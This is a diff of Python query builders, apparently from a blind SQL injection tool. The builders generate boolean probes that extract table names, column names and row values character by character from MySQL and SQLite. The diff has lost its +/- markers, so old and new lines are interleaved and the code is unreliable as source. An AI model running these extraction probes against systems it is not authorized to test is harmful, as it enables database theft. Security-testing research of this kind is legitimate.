return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
|
||||
|
||||
|
||||
def _update_stats(self, ctx, correct):
|
||||
'''Emulates all strategies without sending any requests and updates the
|
||||
statistical information.
|
||||
'''
|
||||
for strategy in self._stats['rpc']:
|
||||
searched_space = set()
|
||||
search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
|
||||
res = search_alg.run(ctx)
|
||||
n_queries = search_alg.n_queries
|
||||
if res is None:
|
||||
binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
|
||||
binary_search.run(ctx)
|
||||
n_queries += binary_search.n_queries
|
||||
|
||||
m = self._stats['rpc'][strategy]
|
||||
m['hist'].append(n_queries)
|
||||
m['hist'] = m['hist'][-100:]
|
||||
m['avg'] = sum(m['hist']) / len(m['hist'])
|
||||
|
||||
|
||||
def _update_stats_str(self, ctx, correct_str):
|
||||
'''Like _update_stats but for whole strings'''
|
||||
ctx.s = ''
|
||||
for c in correct_str:
|
||||
self._update_stats(ctx, c)
|
||||
ctx.s += c
|
||||
|
||||
|
||||
def _get_strategy(self, ctx, searched_space, strategy, correct=None):
|
||||
'''Builds search algorithm configured to search appropriate space.
|
||||
|
||||
Params:
|
||||
ctx (Context): inference context
|
||||
searched_space (list): list of values that have already been searched
|
||||
strategy (str): strategy ('binary', 'unigram', 'fivegram')
|
||||
correct (str|None): correct character
|
||||
|
||||
Returns:
|
||||
SearchAlgorithm: configured search algorithm
|
||||
'''
|
||||
if strategy == 'binary':
|
||||
charset = list(set(self.charset).difference(searched_space))
|
||||
return BinarySearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
values=self.charset,
|
||||
correct=correct,
|
||||
)
|
||||
elif strategy == 'unigram':
|
||||
scores = self.model_unigram.scores(context=[])
|
||||
searched_space.union(set(scores))
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
tree=make_tree(scores),
|
||||
correct=correct,
|
||||
)
|
||||
else:
|
||||
model_ctx = tokenize(ctx.s, add_eos=False)
|
||||
model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
|
||||
scores = self.model_fivegram.scores(context=model_ctx)
|
||||
|
||||
searched_space.union(set(scores))
|
||||
return TreeSearch(
|
||||
self.requester,
|
||||
self.query_char_cb,
|
||||
tree=make_tree(scores),
|
||||
correct=correct,
|
||||
)
|
||||
return None
|
||||
|
@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
|
||||
|
||||
|
||||
|
||||
class DBMS(metaclass=ABCMeta):
|
||||
RE_NORM = re.compile(r'[ \n]+')
|
||||
|
||||
DATA_TYPES = []
|
||||
|
||||
class Queries(metaclass=ABCMeta):
|
||||
'''Class for constructing SQL queries.'''
|
||||
_RE_NORMALIZE = re.compile(r'[ \n]+')
|
||||
|
||||
|
||||
@staticmethod
|
||||
def normalize(s):
|
||||
return DBMS.RE_NORM.sub(' ', s).strip()
|
||||
return Queries._RE_NORMALIZE.sub(' ', s).strip()
|
||||
|
||||
|
||||
@staticmethod
|
||||
def hex(s):
|
||||
return s.encode("utf-8").hex()
|
||||
|
||||
|
||||
|
||||
class MetaQueries(Queries):
|
||||
'''Interface for queries that infer DB metadata.'''
|
||||
@abstractmethod
|
||||
def count_rows(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
|
||||
def column_data_type(self, ctx, values): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def count_tables(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
|
||||
def column_is_nullable(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def count_columns(self, ctx, n):
|
||||
raise NotImplementedError()
|
||||
def column_is_pk(self, ctx): raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def meta_type(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def meta_is_nullable(self, ctx):
|
||||
raise NotImplementedError()
|
||||
|
||||
class UniformQueries(Queries):
|
||||
'''Interface for queries that can be unified.'''
|
||||
@abstractmethod
|
||||
def meta_is_pk(self, ctx):
|
||||
raise NotImplementedError()
|
||||
def rows_count(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def rows_are_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def row_is_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char_is_ascii(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def char_unicode(self, ctx): raise NotImplementedError()
|
||||
@abstractmethod
|
||||
def string(self, ctx, values): raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_rows(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_tables(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
|
||||
@abstractmethod
|
||||
def char_columns(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
class DBMS(metaclass=ABCMeta):
|
||||
'''Database Management System (DBMS) interface.
|
||||
|
||||
@abstractmethod
|
||||
def string_rows(self, ctx, values):
|
||||
raise NotImplementedError()
|
||||
Attributes:
|
||||
DATA_TYPES (list): all data types available
|
||||
MetaQueries (MetaQueries): queries of metadata extraction
|
||||
TablesQueries (UniformQueries): queries for table names extraction
|
||||
ColumnsQueries (UniformQueries): queries for column names extraction
|
||||
RowsQueries (UniformQueries): queries for rows extraction
|
||||
'''
|
||||
_RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
|
||||
|
||||
DATA_TYPES = []
|
||||
|
||||
MetaQueries = None
|
||||
TablesQueries = None
|
||||
ColumnsQueries = None
|
||||
RowsQueries = None
|
||||
|
||||
|
||||
@staticmethod
|
||||
def escape(s):
|
||||
if DBMS._RE_ESCAPE.match(s):
|
||||
return s
|
||||
assert ']' not in s, f'Cannot escape "{s}"'
|
||||
return f'[{s}]'
|
||||
|
@ -1,9 +1,298 @@
|
||||
from hakuin.utils import EOS
|
||||
from hakuin.utils import EOS, ASCII_MAX
|
||||
|
||||
from .DBMS import DBMS
|
||||
from .DBMS import DBMS, MetaQueries, UniformQueries
|
||||
|
||||
|
||||
|
||||
class MySQLMetaQueries(MetaQueries):
    '''MySQL queries that infer column metadata from information_schema.'''

    def _column_query(self, ctx, expression):
        '''Builds a query that evaluates an expression for the column in ctx.

        Params:
            ctx (Context): extraction context providing the table and column
            expression (str): SQL expression to select

        Returns:
            str: normalized query
        '''
        # the names are passed as hex literals, so no quoting is needed
        table_hex = self.hex(ctx.table)
        column_hex = self.hex(ctx.column)
        return self.normalize(
            f'SELECT {expression} '
            'FROM information_schema.columns '
            'WHERE TABLE_SCHEMA=database() AND '
            f"TABLE_NAME=x'{table_hex}' AND "
            f"COLUMN_NAME=x'{column_hex}'"
        )


    def column_data_type(self, ctx, values):
        '''Query: is the (lower-cased) column data type one of the values?'''
        quoted = ','.join(f"'{v}'" for v in values)
        return self._column_query(ctx, f'lower(DATA_TYPE) in ({quoted})')


    def column_is_nullable(self, ctx):
        '''Query: is the column nullable?'''
        return self._column_query(ctx, "IS_NULLABLE='YES'")


    def column_is_pk(self, ctx):
        '''Query: is the column a primary key?'''
        return self._column_query(ctx, "COLUMN_KEY='PRI'")
|
||||
|
||||
|
||||
|
||||
class MySQLTablesQueries(UniformQueries):
    '''MySQL queries for extracting the table names of the current database.'''

    _SOURCE = 'FROM information_schema.TABLES WHERE TABLE_SCHEMA=database()'


    def _all_rows(self, expression):
        '''Builds a normalized query evaluating the expression over all table names.'''
        return self.normalize(f'SELECT {expression} {self._SOURCE}')


    def _one_row(self, ctx, expression):
        '''Builds a normalized query evaluating the expression for the table name at offset ctx.row.'''
        return self.normalize(f'SELECT {expression} {self._SOURCE} LIMIT 1 OFFSET {ctx.row}')


    @staticmethod
    def _next_char(ctx):
        '''SQL expression for the character following the already extracted ctx.s.'''
        return f'substr(TABLE_NAME, {len(ctx.s) + 1}, 1)'


    def rows_count(self, ctx, n):
        '''Query: is the number of tables lower than n?'''
        return self._all_rows(f'count(*) < {n}')


    def rows_are_ascii(self, ctx):
        '''Query: are all table names ASCII?'''
        # min() simulates the logical ALL operator here
        return self._all_rows('min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))')


    def row_is_ascii(self, ctx):
        '''Query: is the table name at offset ctx.row ASCII?'''
        return self._one_row(ctx, 'TABLE_NAME = CONVERT(TABLE_NAME using ASCII)')


    def char_is_ascii(self, ctx):
        '''Query: is the next character ASCII?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {ASCII_MAX + 1}')


    def char(self, ctx, values):
        '''Query: is the next character one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate characters, possibly including EOS

        Returns:
            str: normalized query
        '''
        has_eos = EOS in values
        hex_values = ''.join(v for v in values if v != EOS).encode('utf-8').hex()

        expression = f"locate({self._next_char(ctx)}, x'{hex_values}')"
        if not has_eos:
            # At the end of the string substr() yields '', which locate() always
            # finds. Exclude that case when EOS is not among the candidates.
            expression = f'char_length(TABLE_NAME) != {len(ctx.s)} AND {expression}'
        return self._one_row(ctx, expression)


    def char_unicode(self, ctx, n):
        '''Query: is the code point of the next character lower than n?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {n}')


    def string(self, ctx, values=None):
        '''Not implemented. Accepts values so the signature matches UniformQueries.string.'''
        raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class MySQLColumnsQueries(UniformQueries):
    '''MySQL queries for extracting the column names of the table ctx.table.'''

    def _source(self, ctx):
        '''FROM/WHERE clause selecting the columns of ctx.table (name passed as a hex literal).'''
        return (
            'FROM information_schema.COLUMNS '
            f"WHERE TABLE_SCHEMA=database() AND TABLE_NAME=x'{self.hex(ctx.table)}'"
        )


    def _all_rows(self, ctx, expression):
        '''Builds a normalized query evaluating the expression over all column names.'''
        return self.normalize(f'SELECT {expression} {self._source(ctx)}')


    def _one_row(self, ctx, expression):
        '''Builds a normalized query evaluating the expression for the column name at offset ctx.row.'''
        return self.normalize(f'SELECT {expression} {self._source(ctx)} LIMIT 1 OFFSET {ctx.row}')


    @staticmethod
    def _next_char(ctx):
        '''SQL expression for the character following the already extracted ctx.s.'''
        return f'substr(COLUMN_NAME, {len(ctx.s) + 1}, 1)'


    def rows_count(self, ctx, n):
        '''Query: is the number of columns lower than n?'''
        return self._all_rows(ctx, f'count(*) < {n}')


    def rows_are_ascii(self, ctx):
        '''Query: are all column names ASCII?'''
        # min() simulates the logical ALL operator here
        return self._all_rows(ctx, 'min(COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII))')


    def row_is_ascii(self, ctx):
        '''Query: is the column name at offset ctx.row ASCII?'''
        # No aggregate here: min() would collapse the result into a single row,
        # so OFFSET would select nothing for any ctx.row greater than 0.
        return self._one_row(ctx, 'COLUMN_NAME = CONVERT(COLUMN_NAME using ASCII)')


    def char_is_ascii(self, ctx):
        '''Query: is the next character ASCII?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {ASCII_MAX + 1}')


    def char(self, ctx, values):
        '''Query: is the next character one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate characters, possibly including EOS

        Returns:
            str: normalized query
        '''
        has_eos = EOS in values
        hex_values = ''.join(v for v in values if v != EOS).encode('utf-8').hex()

        expression = f"locate({self._next_char(ctx)}, x'{hex_values}')"
        if not has_eos:
            # At the end of the string substr() yields '', which locate() always
            # finds. Exclude that case when EOS is not among the candidates.
            expression = f'char_length(COLUMN_NAME) != {len(ctx.s)} AND {expression}'
        return self._one_row(ctx, expression)


    def char_unicode(self, ctx, n):
        '''Query: is the code point of the next character lower than n?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {n}')


    def string(self, ctx, values=None):
        '''Not implemented. Accepts values so the signature matches UniformQueries.string.'''
        raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class MySQLRowsQueries(UniformQueries):
    '''MySQL queries for extracting the values of column ctx.column in table ctx.table.'''

    def _all_rows(self, ctx, expression):
        '''Builds a normalized query evaluating the expression over all rows of ctx.table.'''
        return self.normalize(f'SELECT {expression} FROM {MySQL.escape(ctx.table)}')


    def _one_row(self, ctx, expression):
        '''Builds a normalized query evaluating the expression for the row at offset ctx.row.'''
        return self.normalize(
            f'SELECT {expression} FROM {MySQL.escape(ctx.table)} LIMIT 1 OFFSET {ctx.row}'
        )


    @staticmethod
    def _next_char(ctx):
        '''SQL expression for the character following the already extracted ctx.s.'''
        return f'substr({MySQL.escape(ctx.column)}, {len(ctx.s) + 1}, 1)'


    def rows_count(self, ctx, n):
        '''Query: is the number of rows lower than n?'''
        return self._all_rows(ctx, f'count(*) < {n}')


    def rows_are_ascii(self, ctx):
        '''Query: are the column values of all rows ASCII?'''
        column = MySQL.escape(ctx.column)
        # min() simulates the logical ALL operator here
        return self._all_rows(ctx, f'min({column} = CONVERT({column} using ASCII))')


    def row_is_ascii(self, ctx):
        '''Query: is the column value at offset ctx.row ASCII?'''
        column = MySQL.escape(ctx.column)
        # No aggregate here: min() would collapse the result into a single row,
        # so OFFSET would select nothing for any ctx.row greater than 0.
        return self._one_row(ctx, f'{column} = CONVERT({column} using ASCII)')


    def char_is_ascii(self, ctx):
        '''Query: is the next character ASCII?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {ASCII_MAX + 1}')


    def char(self, ctx, values):
        '''Query: is the next character one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate characters, possibly including EOS

        Returns:
            str: normalized query
        '''
        has_eos = EOS in values
        hex_values = ''.join(v for v in values if v != EOS).encode('utf-8').hex()

        expression = f"locate({self._next_char(ctx)}, x'{hex_values}')"
        if not has_eos:
            # At the end of the string substr() yields '', which locate() always
            # finds. Exclude that case when EOS is not among the candidates.
            expression = f'char_length({MySQL.escape(ctx.column)}) != {len(ctx.s)} AND {expression}'
        return self._one_row(ctx, expression)


    def char_unicode(self, ctx, n):
        '''Query: is the code point of the next character lower than n?'''
        return self._one_row(ctx, f'ord(convert({self._next_char(ctx)} using utf32)) < {n}')


    def string(self, ctx, values):
        '''Query: is the whole column value one of the values?

        Params:
            ctx (Context): extraction context
            values (list): candidate strings

        Returns:
            str: normalized query
        '''
        hex_values = ','.join(f"x'{v.encode('utf-8').hex()}'" for v in values)
        return self._one_row(ctx, f'{MySQL.escape(ctx.column)} in ({hex_values})')
|
||||
|
||||
|
||||
|
||||
class MySQL(DBMS):
|
||||
DATA_TYPES = [
|
||||
@ -14,151 +303,15 @@ class MySQL(DBMS):
|
||||
'multilinestring', 'multipolygon', 'geometrycollection ', 'json'
|
||||
]
|
||||
|
||||
MetaQueries = MySQLMetaQueries()
|
||||
TablesQueries = MySQLTablesQueries()
|
||||
ColumnsQueries = MySQLColumnsQueries()
|
||||
RowsQueries = MySQLRowsQueries()
|
||||
|
||||
|
||||
def count_rows(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM {ctx.table}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_tables(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_columns(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
query = f'''
|
||||
SELECT LOWER(DATA_TYPE) in ({','.join(values)})
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT IS_NULLABLE='YES'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT COLUMN_KEY='PRI'
|
||||
FROM information_schema.columns
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}' AND
|
||||
COLUMN_NAME='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_rows(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING({ctx.column}, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_tables(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.TABLES
|
||||
WHERE TABLE_SCHEMA=DATABASE()
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_columns(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1) != '' AND
|
||||
LOCATE(SUBSTRING(COLUMN_NAME, {len(ctx.s) + 1}, 1), x'{values}')
|
||||
FROM information_schema.COLUMNS
|
||||
WHERE TABLE_SCHEMA=DATABASE() AND
|
||||
TABLE_NAME='{ctx.table}'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string_rows(self, ctx, values):
|
||||
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT {ctx.column} in ({','.join(values)})
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
@staticmethod
def escape(s):
    '''Escapes an identifier (e.g., table or column name) for use in MySQL queries.

    Params:
        s (str): identifier

    Returns:
        str: the identifier itself if it consists only of safe characters,
             otherwise the identifier enclosed in backticks

    Raises:
        AssertionError: if the identifier contains a backtick and cannot be escaped
    '''
    # fullmatch() is required here; match() only anchors at the start and would
    # accept any identifier that merely begins with a safe character.
    if DBMS._RE_ESCAPE.fullmatch(s):
        return s
    # raised explicitly so that the check is not stripped when running with -O
    if '`' in s:
        raise AssertionError(f'Cannot escape "{s}"')
    return f'`{s}`'
|
||||
|
@ -1,145 +1,290 @@
|
||||
from hakuin.utils import EOS
|
||||
|
||||
from .DBMS import DBMS
|
||||
from .DBMS import DBMS, MetaQueries, UniformQueries
|
||||
|
||||
|
||||
|
||||
class SQLite(DBMS):
|
||||
DATA_TYPES = ['INTEGER', 'TEXT', 'REAL', 'NUMERIC', 'BLOB']
|
||||
|
||||
|
||||
|
||||
def count_rows(self, ctx, n):
|
||||
class SQLiteMetaQueries(MetaQueries):
|
||||
def column_data_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM {ctx.table}
|
||||
SELECT type in ({','.join(values)})
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_tables(self, ctx, n):
|
||||
def column_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
SELECT [notnull] == 0
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def column_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT pk
|
||||
FROM pragma_table_info(x'{self.hex(ctx.table)}')
|
||||
WHERE name=x'{self.hex(ctx.column)}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
|
||||
class SQLiteTablesQueries(UniformQueries):
|
||||
def rows_count(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT count(*) < {n}
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def count_columns(self, ctx, n):
|
||||
def rows_are_ascii(self, ctx):
|
||||
# SQLite does not have native "isascii" function. As a workaround we try to look for
|
||||
# non-ascii characters with "*[^\x01-\x7f]*" glob patterns. The pattern does not need to
|
||||
# include the null terminator (0x00) because SQLite will never pass it to the GLOB expression.
|
||||
# Also, the pattern is hex-encoded because SQLite does not support special characters in
|
||||
# string literals. Lastly, sum() simulates the logical ANY operator here. Note that an empty string
|
||||
# resolves to True, which is correct.
|
||||
query = f'''
|
||||
SELECT COUNT(*) < {n}
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
SELECT sum(name not glob cast(x'2a5b5e012d7f5d2a' as TEXT))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_type(self, ctx, values):
|
||||
values = [f"'{v}'" for v in values]
|
||||
def row_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT type in ({','.join(values)})
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_nullable(self, ctx):
|
||||
query = f'''
|
||||
SELECT [notnull] == 0
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def meta_is_pk(self, ctx):
|
||||
query = f'''
|
||||
SELECT pk
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
WHERE name='{ctx.column}'
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_rows(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
# if the next char is EOS, substr() resolves to "" and subsequently instr(..., "") resolves to True
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr({ctx.column}, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr({ctx.column}, {len(ctx.s) + 1}, 1))
|
||||
FROM {ctx.table}
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_tables(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_columns(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('ascii').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) != '' AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM pragma_table_info('{ctx.table}')
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string_rows(self, ctx, values):
|
||||
values = [f"x'{v.encode('ascii').hex()}'" for v in values]
|
||||
query = f'''
|
||||
SELECT cast({ctx.column} as BLOB) in ({','.join(values)})
|
||||
FROM {ctx.table}
|
||||
SELECT name not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_is_ascii(self, ctx):
|
||||
query = f'''
|
||||
SELECT substr(name, {len(ctx.s) + 1}, 1) not glob cast(x'2a5b5e012d7f5d2a' as TEXT)
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char(self, ctx, values):
|
||||
has_eos = EOS in values
|
||||
values = [v for v in values if v != EOS]
|
||||
values = ''.join(values).encode('utf-8').hex()
|
||||
|
||||
if has_eos:
|
||||
query = f'''
|
||||
SELECT instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
else:
|
||||
query = f'''
|
||||
SELECT length(name) != {len(ctx.s)} AND
|
||||
instr(x'{values}', substr(name, {len(ctx.s) + 1}, 1))
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def char_unicode(self, ctx, n):
|
||||
query = f'''
|
||||
SELECT unicode(substr(name, {len(ctx.s) + 1}, 1)) < {n}
|
||||
FROM sqlite_master
|
||||
WHERE type='table'
|
||||
LIMIT 1
|
||||
OFFSET {ctx.row}
|
||||
'''
|
||||
return self.normalize(query)
|
||||
|
||||
|
||||
def string(self, ctx):
|
||||
raise NotImplementedError('TODO?')
|
||||
|
||||
|
||||
|
||||
class SQLiteColumnsQueries(UniformQueries):
    '''SQLite queries for extracting the column names of the table ctx.table.'''

    # Hex-encoded glob pattern "*[^\x01-\x7f]*"; it matches strings containing
    # a non-ASCII character, so "not glob" is true for ASCII-only strings.
    _NON_ASCII_GLOB = "cast(x'2a5b5e012d7f5d2a' as TEXT)"


    def _source(self, ctx):
        '''FROM clause listing the columns of ctx.table (name passed as a hex literal).'''
        return f"FROM pragma_table_info(x'{self.hex(ctx.table)}')"


    def _all_rows(self, ctx, expression):
        '''Builds a normalized query evaluating the expression over all column names.'''
        return self.normalize(f'SELECT {expression} {self._source(ctx)}')


    def _one_row(self, ctx, expression):
        '''Builds a normalized query evaluating the expression for the column name at offset ctx.row.'''
        return self.normalize(f'SELECT {expression} {self._source(ctx)} LIMIT 1 OFFSET {ctx.row}')


    @staticmethod
    def _next_char(ctx):
        '''SQL expression for the character following the already extracted ctx.s.'''
        return f'substr(name, {len(ctx.s) + 1}, 1)'


